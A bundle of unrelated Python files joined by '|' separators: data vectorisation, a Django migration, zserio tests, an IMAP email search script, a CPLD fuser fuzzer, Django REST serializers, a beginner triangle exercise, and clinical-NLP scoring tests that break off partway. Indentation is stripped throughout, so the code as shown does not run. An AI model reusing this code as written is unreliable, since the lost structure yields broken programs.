from sklearn.kernel_approximation import RBFSampler
from sklearn.preprocessing import scale
# entrée => dataFrame + liste champs à vectoriser + seuil
# sortie => DataFrame vectorisé
# !!! NaN
def vectorize(DataFrame, cols, thres):
mat = pd.DataFrame(DataFrame)
nrows = len(mat)
newmat = pd.DataFrame(dtype=int)
for field in cols:
m = np.array((mat[field].value_counts()/nrows).reset_index())
m = np.array(filter(lambda row: row[1]>thres, m))
for e in m:
newmat[field + '|' + str(e[0])] = mat[field].apply(lambda row: 1 if(row==e[0]) else 0)
if float(mat[field].isnull().sum())/nrows>thres:
newmat[field + '|NaN'] = mat[field].isnull().astype(int)
print newmat.sum()
return newmat
def kpca_vector(DataFrame,cols,gamma,n_comp=3,thres=0.001):
mat = pd.DataFrame(DataFrame)
mat = mat[cols]
vector = vectorize(mat,cols,thres)
mat = pd.concat([mat,vector],axis=1)
mat.drop(cols,axis=1,inplace=True)
kern = scale(np.array(mat,dtype=np.float))
kpca = RBFSampler(n_components=n_comp, gamma=gamma)
kern = kpca.fit_transform(kern)
mat.drop(mat.columns,axis=1,inplace=True)
cols = ['kpca'+ str(i) for i in range(n_comp)]
for c in cols:
mat[c]=np.zeros(len(mat))
mat[cols]=kern
return mat
|
# Generated by Django 2.2.12 on 2020-06-03 12:52
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
("users", "0009_auto_20200505_0942"),
]
operations = [
migrations.AlterField(
model_name="userorganisationrelationship",
name="organisation",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, related_name="users", to="organisations.Organisation"
),
),
]
|
import unittest
import zserio
from testutils import getZserioApi
class UInt64EnumTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.api = getZserioApi(__file__, "enumeration_types.zs").uint64_enum
def testValues(self):
self.assertEqual(NONE_COLOR_VALUE, self.api.DarkColor.NONE_COLOR.value)
self.assertEqual(DARK_RED_VALUE, self.api.DarkColor.DARK_RED.value)
self.assertEqual(DARK_BLUE_VALUE, self.api.DarkColor.DARK_BLUE.value)
self.assertEqual(DARK_GREEN_VALUE, self.api.DarkColor.DARK_GREEN.value)
def testFromReader(self):
writer = zserio.BitStreamWriter()
writer.write_bits(self.api.DarkColor.DARK_GREEN.value, DARK_COLOR_BITSIZEOF)
reader = zserio.BitStreamReader(writer.byte_array, writer.bitposition)
color = self.api.DarkColor.from_reader(reader)
self.assertEqual(DARK_GREEN_VALUE, color.value)
def testBitSizeOf(self):
self.assertEqual(DARK_COLOR_BITSIZEOF, self.api.DarkColor.NONE_COLOR.bitsizeof())
self.assertEqual(DARK_COLOR_BITSIZEOF, self.api.DarkColor.DARK_RED.bitsizeof())
self.assertEqual(DARK_COLOR_BITSIZEOF, self.api.DarkColor.DARK_BLUE.bitsizeof())
self.assertEqual(DARK_COLOR_BITSIZEOF, self.api.DarkColor.DARK_GREEN.bitsizeof())
def testInitializeOffsets(self):
self.assertEqual(DARK_COLOR_BITSIZEOF, self.api.DarkColor.NONE_COLOR.initialize_offsets(0))
self.assertEqual(DARK_COLOR_BITSIZEOF + 1, self.api.DarkColor.DARK_RED.initialize_offsets(1))
self.assertEqual(DARK_COLOR_BITSIZEOF + 2, self.api.DarkColor.DARK_BLUE.initialize_offsets(2))
self.assertEqual(DARK_COLOR_BITSIZEOF + 3, self.api.DarkColor.DARK_GREEN.initialize_offsets(3))
def testWrite(self):
writer = zserio.BitStreamWriter()
self.api.DarkColor.DARK_RED.write(writer)
reader = zserio.BitStreamReader(writer.byte_array, writer.bitposition)
self.assertEqual(DARK_RED_VALUE, reader.read_bits(DARK_COLOR_BITSIZEOF))
DARK_COLOR_BITSIZEOF = 64
NONE_COLOR_VALUE = 0
DARK_RED_VALUE = 1
DARK_BLUE_VALUE = 2
DARK_GREEN_VALUE = 7
|
#!/usr/bin/env python
import sys
import imaplib
import email
import datetime
from barbara import app
USER_EMAIL = app.config['USER_EMAIL_FOR_PROMOTIONS']
USER_PASSWORD = app.config['USER_EMAIL_PASSWORD']
EMAIL_LABEL = 'INBOX'
SEARCH_TYPE_ALL = 'ALL'
SORT_RECENT_FIRST = 'REVERSE DATE' # Descending, most recent email first
ENCODING_UTF_8 = 'UTF-8'
MAIL_TIME_FRAME = 30 # <-- days one month email only
def read_email(search_pattern):
MAIL_BOX = imaplib.IMAP4_SSL('imap.gmail.com')
search_response = None
try:
MAIL_BOX.login(USER_EMAIL, USER_PASSWORD)
except imaplib.IMAP4.error:
print("LOGIN FAILED!!! ")
return None
# ... exit or deal with failure...
rv, mailboxes = MAIL_BOX.list()
if rv == 'OK':
print("Mailboxes:")
print(mailboxes)
rv, data = MAIL_BOX.select(EMAIL_LABEL)
if rv == 'OK':
print("Processing mailbox...\n")
search_response = process_mailbox(MAIL_BOX, search_pattern) # ... do something with emails, see below ...
MAIL_BOX.close()
MAIL_BOX.logout()
return search_response
# Note: This function definition needs to be placed
# before the previous block of code that calls it.
def process_mailbox(MAIL_BOX_INSTANCE, search_pattern):
# regex = r'(X-GM-RAW "subject:\"%s\"")' % search_pattern
search_response = []
print(search_pattern)
date = (datetime.date.today() - datetime.timedelta(MAIL_TIME_FRAME)).strftime("%d-%b-%Y")
rv, data = MAIL_BOX_INSTANCE.search(None, SEARCH_TYPE_ALL,
'(SENTSINCE {date} HEADER Subject "{subject_pattern}")'
.format(date=date, subject_pattern=search_pattern))
# M.sort(SORT_RECENT_FIRST, ENCODING_UTF_8, SEARCH_TYPE_ALL, regex) #
if rv != 'OK':
print("No messages found!")
return None
for num in data[0].split():
rv, data = MAIL_BOX_INSTANCE.fetch(num, '(RFC822)')
if rv != 'OK':
print("ERROR getting message", num)
return None
msg = email.message_from_string(data[0][1])
print('Message %s: %s' % (num, msg['Subject']))
print('Raw Date:', msg['Date'])
search_response.append(msg['Subject'])
date_tuple = email.utils.parsedate_tz(msg['Date'])
if date_tuple:
local_date = datetime.datetime.fromtimestamp(
email.utils.mktime_tz(date_tuple))
print("Local Date:", \
local_date.strftime("%a, %d %b %Y %H:%M:%S"))
return search_response
|
# UIM muxes are fuzzed in three stages. This third stage is a depth fuzzer: it discovers all
# remaining UIM mux choices by recursively searching the routing state space with a highly
# randomized algorithm based on Knuth's "Algorithm X". (This is the only nondeterministic fuzzer
# in the project.)
import random
import subprocess
from util import database, toolchain, bitdiff, progress
with database.transact() as db:
for device_name, device in db.items():
progress(device_name)
det_random = random.Random(0)
package, pinout = next(iter(device['pins'].items()))
blocks = device['blocks']
uim_mux_range = range(*device['ranges']['uim_muxes'])
uim_mux_size = len(uim_mux_range) // len(device['switches'])
def run(nets, probe_macrocell):
pads = [net[:-4] for net in nets if net.endswith("_PAD")]
fbs = [net[:-3] for net in nets if net.endswith("_FB")]
sigs = pads + fbs
ins = [f"input {pad}" for pad in pads]
bffs = [f"wire {fb}; DFF fb_{fb}(1'b0, 1'b0, {fb}); " for fb in fbs]
ands = []
# We need way too many inputs to rely on existing primitives.
ands.append(f"wire Y0; BUF b(1'b1, Y0); ")
y_wire = "Y0"
for n, off in enumerate(range(0, len(sigs), 3)):
chunk = sigs[off:off + 3]
last = (off + 3 >= len(sigs))
ands.append(f"wire Y{n+1}; AND{len(chunk) + 1} "
f"a_{n+1}(Y{n}, {', '.join(chunk)}, Y{n+1}); ")
y_wire = f"Y{n+1}"
return toolchain.run(
f"module top(output Q, {', '.join(ins)}); "
f"{' '.join(bffs)} "
f"{' '.join(ands)} "
f"DFF ff(1'b0, {y_wire}, Q); "
f"endmodule",
{
'Q': pinout[probe_macrocell['pad']],
**{
pad: pinout[pad]
for pad in pads
},
**{
f"fb_{fb}": str(600 + int(fb[2:]))
for fb in fbs
},
},
f"{device_name}-{package}")
switches = device['switches']
uim_fuses_total = len(uim_mux_range)
uim_fuses_known = None
# Obtained through celestial rituals.
if device_name.startswith("ATF1502"):
gnd_per_block = 32
elif device_name.startswith("ATF1504"):
gnd_per_block = 28
elif device_name.startswith("ATF1508"):
gnd_per_block = 36
else:
assert False
extra = 0
visited = set()
while (uim_fuses_known is None or
uim_fuses_known + len(device['blocks']) * gnd_per_block < uim_fuses_total):
uim_fuses_known = sum(len(switch['mux']['values']) - 1
for switch in device['switches'].values())
progress(2)
progress((uim_fuses_known, uim_fuses_total))
all_blocks_failed = True
for block_name, block in device['blocks'].items():
block_uim_muxes = {uim_name: switches[uim_name]['mux']
for uim_name in block['switches']}
block_uim_nets = set(sum((list(net_name
for net_name in switches[uim_name]['mux']['values']
if not net_name.startswith('GND'))
for uim_name in block['switches']), []))
dead_branches = 0
dull_reduces = 0
def extract_fuses(net_set):
assert len(net_set) < 40
for probe_macrocell_name, probe_macrocell in device['macrocells'].items():
if probe_macrocell['block'] != block_name: continue
if f"{probe_macrocell_name}_FB" in net_set: continue
if f"{probe_macrocell['pad']}_PAD" in net_set: continue
break
else:
assert False
return run(sorted(net_set), probe_macrocell)
def find_muxes(net_set, fuses):
nets = set(net_set)
found = 0
found_uim_name = found_uim_value = None
for new_uim_name, new_uim_mux in block_uim_muxes.items():
new_uim_value = sum(fuses[fuse] << n_fuse
for n_fuse, fuse in enumerate(new_uim_mux['fuses']))
if new_uim_value == new_uim_mux['values']['GND1']: continue
for new_uim_net, new_uim_net_value in new_uim_mux['values'].items():
if new_uim_net_value == new_uim_value:
nets.remove(new_uim_net)
break
else:
found += 1
found_uim_name = new_uim_name
found_uim_value = new_uim_value
if found == 1:
assert len(nets) == 1, f"expected a single net, not {nets}"
found_uim_net = nets.pop()
found_uim_mux = device['switches'][found_uim_name]['mux']
assert found_uim_net not in found_uim_mux['values']
assert found_uim_value not in found_uim_mux['values'].values()
found_uim_mux['values'][found_uim_net] = found_uim_value
return found
def reduce_leaf(net_set):
global dull_reduces
try:
fuses = extract_fuses(net_set)
except toolchain.FitterError:
return False
except subprocess.CalledProcessError as err:
if err.returncode == 245:
return False
raise
found = find_muxes(net_set, fuses)
if found == 0:
return False
elif found == 1:
return True
else: # found > 1
progress(1)
for net_name in det_random.sample(sorted(net_set), len(net_set)):
if dull_reduces > 10:
break
if reduce_leaf(net_set.difference({net_name})):
found = find_muxes(net_set, fuses)
if found <= 1:
break
else:
dull_reduces += 1
return True
def search_tree(uims, nets, net_set=frozenset(), extra=0):
global dead_branches, live_leaves, dull_reduces
if dead_branches > 20:
return False
if len(uims) == 0 or len(nets) == 0:
net_set = net_set.union(
det_random.sample(sorted(block_uim_nets - net_set), extra))
while len(net_set) > 35:
net_set.remove(det_random.sample(sorted(net_set)))
if net_set in visited:
return False
else:
visited.add(net_set)
dull_reduces = 0
if reduce_leaf(net_set):
dead_branches = 0
return True
else:
dead_branches += 1
return False
uim_name = det_random.choice(sorted(uims))
net_names = [name for name in switches[uim_name]['mux']['values']
if name in nets]
for net_name in det_random.sample(net_names, len(net_names)):
removed_uims = set(uim_name for uim_name in block_uim_muxes
if net_name in switches[uim_name]['mux']['values'])
removed_nets = set(sum((list(switches[uim_name]['mux']['values'])
for uim_name in removed_uims), []))
if search_tree(uims=uims - removed_uims,
nets=nets - removed_nets,
net_set=net_set.union({net_name}),
extra=extra):
return True
return False
uims = set(block_uim_muxes)
nets = set(sum((list(name for name in switches[uim_name]['mux']['values']
if not name.startswith('GND'))
for uim_name in block_uim_muxes), []))
if search_tree(uims, nets, extra=extra):
all_blocks_failed = False
if all_blocks_failed:
progress(3)
extra += 1
for switch_name, switch in device['switches'].items():
mux = switch['mux']
if 'GND0' in mux['values']: continue
# Some UIM muxes have one fuse which is never used by the fitter. Hardware testing
# and celestial rituals demonstrate that this fuse drives the PT input network low.
assert (len(mux['values']) - 1) in (len(mux['fuses']) - 1, len(mux['fuses'])), \
f"UIM mux {switch_name} should have zero or one unused values"
# Setting the mux to all-ones (erased state) has the exact same result, so call the GND
# with all-ones "GND1" and the GND with one fuse set to 0 "GND0".
erased_value = (1 << len(mux['fuses'])) - 1
mux['values']['GND1'] = erased_value
for n_fuse in range(len(mux['fuses'])):
value = erased_value ^ (1 << n_fuse)
if value not in mux['values'].values():
mux['values']['GND0'] = value
# Make chipdb deterministic.
mux['values'] = {
key: value
for key, value in sorted(mux['values'].items(),
key=lambda kv: erased_value ^ kv[1])
}
|
# -*- coding: utf-8 -*-
from datetime import datetime, date, timedelta
from odoo import models, fields, api, _
from odoo.exceptions import Warning
class DocumentType(models.Model):
_name = 'document.type'
name = fields.Char(string="Name", required=True, help="Name")
|
import pytest
from qforce_examples import Gaussian_default
from qforce.main import run_qforce
@pytest.mark.parametrize("batch_run,exist", [(True, False), (False, True)])
def test_BatchRun(batch_run, exist, tmpdir):
setting = tmpdir.join('settings')
setting.write('''[scan]
batch_run = {}
frag_lib = {}/qforce_fragments
'''.format(batch_run, tmpdir))
tmpdir.mkdir('propane_qforce')
tmpdir.join('propane_qforce').join('propane_hessian.log').mksymlinkto(
Gaussian_default['out_file'])
tmpdir.join('propane_qforce').join('propane_hessian.fchk').mksymlinkto(
Gaussian_default['fchk_file'])
tmpdir.join('propane.xyz').mksymlinkto(
Gaussian_default['xyz_file'])
# First run
try:
run_qforce(input_arg=tmpdir.join('propane.xyz').strpath,
config=tmpdir.join('settings').strpath)
except SystemExit:
pass
# Fragment file generated
assert tmpdir.join('propane_qforce').join('fragments').join(
'CC_H8C3_d91b46644317dee9c2b868166c66a18c~1.inp').isfile()
tmpdir.join('propane_qforce').join('fragments').remove()
# Second run
try:
run_qforce(input_arg=tmpdir.join('propane.xyz').strpath,
config=tmpdir.join('settings').strpath)
except SystemExit:
pass
# Fragment file generated again if batch_run is False
# Fragment file not generated again if batch_run is True
assert tmpdir.join('propane_qforce').join('fragments').join(
'CC_H8C3_d91b46644317dee9c2b868166c66a18c~1.inp').isfile() is exist
|
import json
import os
import pickle
import random
import shutil
import sys
from pathlib import Path
import pytesseract
import yaml
from tqdm import tqdm
import cv2
from glob import glob
from PIL import Image
import torch
import numpy as np
from decord import VideoReader, cpu
from brisque import BRISQUE
import traceback
import clip
device = "cuda" if torch.cuda.is_available() else "cpu"
print('USING DEVICE: ' + device)
model, preprocess = clip.load("ViT-B/32", device=device, jit=False) # Must set jit=False for training
def encode_images(photos_batch):
photos = [Image.open(photo_file) for photo_file in photos_batch]
photos_preprocessed = torch.stack([preprocess(photo) for photo in photos]).to(device)
with torch.no_grad():
photos_features = model.encode_image(photos_preprocessed)
photos_features /= photos_features.norm(dim=-1, keepdim=True)
return photos_features.cpu().numpy()
# train = json.load(open('train_data.json', 'r'))
# valid = json.load(open('valid_data.json', 'r'))
# test = json.load(open('test_data.json', 'r'))
#
# dataset = train | valid | test
dataset = yaml.load(open('ann_valid_data_rich.yaml', 'r'))
total_images = 0
diffs_images = 0
total_vids = 0
diffs_vids = 0
for img_set, val in tqdm(list(dataset.items())):
img_files = list(((Path('games')/ img_set).glob("*.jpg")))
img_files = sorted(img_files, key=lambda x: int(str(x).split('/')[-1].split('.')[0][3:]))
img_embs = encode_images(img_files)
for idx, details in val.items():
example_diff = 0
for j in range(10):
if j != int(idx):
dist = float(np.linalg.norm(img_embs[int(idx)] - img_embs[j]))
example_diff += dist
if 'open-images' in img_set:
diffs_images += dist
total_images += 1
else:
diffs_vids += dist
total_vids += 1
details['sum_image_differences'] = str(round(example_diff,4))
dataset[img_set][idx] = details
yaml.dump(dataset, open('ann_valid_data_rich.yaml', 'w'), default_style='"', sort_keys=False)
print(f'Average video similarity: {round(diffs_vids/total_vids, 4)}')
print(f'Average image similarity: {round(diffs_images/total_images, 4)}')
|
#!/usr/bin/env python3
# encoding=utf-8
from setuptools import setup, find_packages
if __name__ == '__main__':
setup(
#package_dir={'animalia': 'animalia'},
# this works if species.txt is at ./animalia/species.txt
#package_data={'animalia': ['species.txt']},
# blah
#packages=['find:', 'animalia'],
#packages=find_packages('src'),
#package_dir={'': 'src'},
include_package_data=True,
#package_data={'': ['data/species.txt']},
#this gets installed in /usr/share/animalia/species.txt
# animalia-0.0.12.data/data/share/animalia/species.txt
# data_files=[('share/animalia', ['data/species.txt'])],
)
|
from django.shortcuts import get_object_or_404
from rest_framework import serializers
from rest_framework.exceptions import APIException
from rest_framework.status import HTTP_400_BAD_REQUEST
from accounts.serializers import UserBasicPublicSerializer
from categories.models import SubCategory
from posts.models import Post
from threads.models import Thread, ThreadPost
from states.models import PendingState
from categories.serializers import SubCategory_PlusParent_Serializer
from posts.serializers import PostSerializer
class Thread_BasicInfo_Serializer(serializers.ModelSerializer):
user = UserBasicPublicSerializer(source='post.user', read_only=True)
url = serializers.CharField(source='get_absolute_url', read_only=True)
sub_category = SubCategory_PlusParent_Serializer(source="category", read_only=True)
sub_category_id = serializers.IntegerField(write_only=True)
class Meta:
model = Thread
fields = (
'user', 'url', 'title', 'description', 'sub_category', 'sub_category_id',
'is_private', 'created', 'visits_count', 'comments_count',
)
extra_kwargs = {
'is_private': {'read_only': True},
'created': {'read_only': True},
'visits_count': {'read_only': True},
'comments_count': {'read_only': True},
}
class Thread_ReadPendingState_Serializer(Thread_BasicInfo_Serializer):
pending_state = serializers.CharField(source='pending_state.state')
class Meta(Thread_BasicInfo_Serializer.Meta):
model = Thread
fields = Thread_BasicInfo_Serializer.Meta.fields + ('pending_state',)
read_only_fields = Thread_BasicInfo_Serializer.Meta.fields
class Thread_WritePendingState_Serializer(serializers.ModelSerializer):
pending_state = serializers.CharField(source='pending_state.state')
class Meta:
model = Thread
fields = ('pending_state',)
def validate_pending_state(self, value):
if value not in PendingState.states:
raise APIException(detail=f'only allowed {", ".join(PendingState.states)}', code=HTTP_400_BAD_REQUEST)
return value
def update(self, instance, validated_data):
new_state_value = validated_data.get('pending_state', instance.pending_state.state)
new_state, _ = PendingState.objects.get_or_create(state=new_state_value)
instance.pending_state = new_state
instance.save()
return instance
class ThreadComment_Serializer(serializers.ModelSerializer):
post = PostSerializer(read_only=True)
class Meta:
model = ThreadPost
fields = ('post', )
class Thread_FullInfo_Serializer(Thread_BasicInfo_Serializer):
post = PostSerializer()
comments = ThreadComment_Serializer(source='posts', many=True, read_only=True)
class Meta(Thread_BasicInfo_Serializer.Meta):
fields = Thread_BasicInfo_Serializer.Meta.fields + ('post', 'comments')
def create(self, validated_data):
request = self.context.get('request')
post_data = validated_data.get('post')
post = Post.objects.create_deep({'user': request.user, **post_data})
category_id = validated_data.pop('sub_category_id')
category = get_object_or_404(SubCategory, pk=category_id)
validated_data.update({'post': post, 'category': category})
return Thread.objects.create(**validated_data)
def update(self, instance, validated_data):
instance.title = validated_data.get('title', instance.title)
category_id = validated_data.get('sub_category_id', instance.category.pk)
instance.category = get_object_or_404(SubCategory, pk=category_id)
post_data = validated_data.get('post')
Post.objects.update_deep(instance.post, post_data)
instance.category.save()
instance.save()
return instance
class Thread_Owner_Serializer(Thread_FullInfo_Serializer):
pending_state = serializers.CharField(source='pending_state.state', read_only=True)
privacy_state = serializers.CharField(source='privacy_state.state', read_only=True)
class Meta(Thread_FullInfo_Serializer.Meta):
fields = Thread_FullInfo_Serializer.Meta.fields + ('pending_state', 'privacy_state')
|
# Curso Python 12
# ---Desafio 42---
# Refaça o Desafio 035 dos triângulos, acrescentando o recurso
# de mostrar que tipo de triângulo será formado
from math import fabs
seg1 = float(input('Digite o comprimento do Segmento AB: '))
seg2 = float(input('Digite o comprimento do Segmento BC: '))
seg3 = float(input('Digite o comprimento do Segmento CA: '))
condicao1 = (fabs(seg2 - seg3) < seg1 < (seg2 + seg3))
condicao2 = (fabs(seg1 - seg3) < seg2 < (seg1 + seg3))
condicao3 = (fabs(seg1 - seg2) < seg3 < (seg1 + seg2))
if condicao1 and condicao2 and condicao3:
print('Os segmentos acima podem formar um ', end='')
if seg1 == seg2 and seg1 == seg3:
print('Triangulo Equilátero')
elif seg1 == seg2 or seg2 == seg3 or seg3 == seg1:
print('Triangulo Isósceles')
elif seg1 != seg2 and seg2 != seg3:
print('Triangulo Escaleno')
else:
print('Os segmentos acima NÃO podem formar um triângulo')
|
import os
import sys
import re
import tempfile
import json
import args_and_configs
import scoring_metrics
import text_extraction
from pytest import approx
from pandas.testing import assert_frame_equal
#############################################
## Test helper functions
#############################################
def initialize_perfect_track1_score_card():
score_card = scoring_metrics.new_score_card()
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'DRUG-ABUSE' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'ALCOHOL-ABUSE' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'ENGLISH' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'MAKES-DECISIONS' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'ABDOMINAL' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'MAJOR-DIABETES' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'ADVANCED-CAD' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'MI-6MOS' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'KETO-1YR' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'DIETSUPP-2MOS' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'ASP-FOR-MI' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'HBA1C' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'CREATININE' , 'not met' , 'TP' ]
##
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'DRUG-ABUSE' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'ALCOHOL-ABUSE' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'ENGLISH' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'MAKES-DECISIONS' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'ABDOMINAL' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'MAJOR-DIABETES' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'ADVANCED-CAD' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'MI-6MOS' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'KETO-1YR' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'DIETSUPP-2MOS' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'ASP-FOR-MI' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'HBA1C' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'CREATININE' , 'not met' , 'TP' ]
##
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'DRUG-ABUSE' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'ALCOHOL-ABUSE' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'ENGLISH' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'MAKES-DECISIONS' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'ABDOMINAL' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'MAJOR-DIABETES' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'ADVANCED-CAD' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'MI-6MOS' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'KETO-1YR' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'DIETSUPP-2MOS' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'ASP-FOR-MI' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'HBA1C' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'CREATININE' , 'met' , 'TP' ]
return score_card
def initialize_track1_score_card_with_errors():
score_card = scoring_metrics.new_score_card()
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'DRUG-ABUSE' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'ALCOHOL-ABUSE' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'ENGLISH' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'MAKES-DECISIONS' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'ABDOMINAL' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'MAJOR-DIABETES' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'ADVANCED-CAD' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'MI-6MOS' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'KETO-1YR' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'DIETSUPP-2MOS' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'ASP-FOR-MI' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'HBA1C' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'CREATININE' , 'not met' , 'TP' ]
##
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'DRUG-ABUSE' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'ALCOHOL-ABUSE' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'ENGLISH' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'MAKES-DECISIONS' , 'met' , 'TP' ]
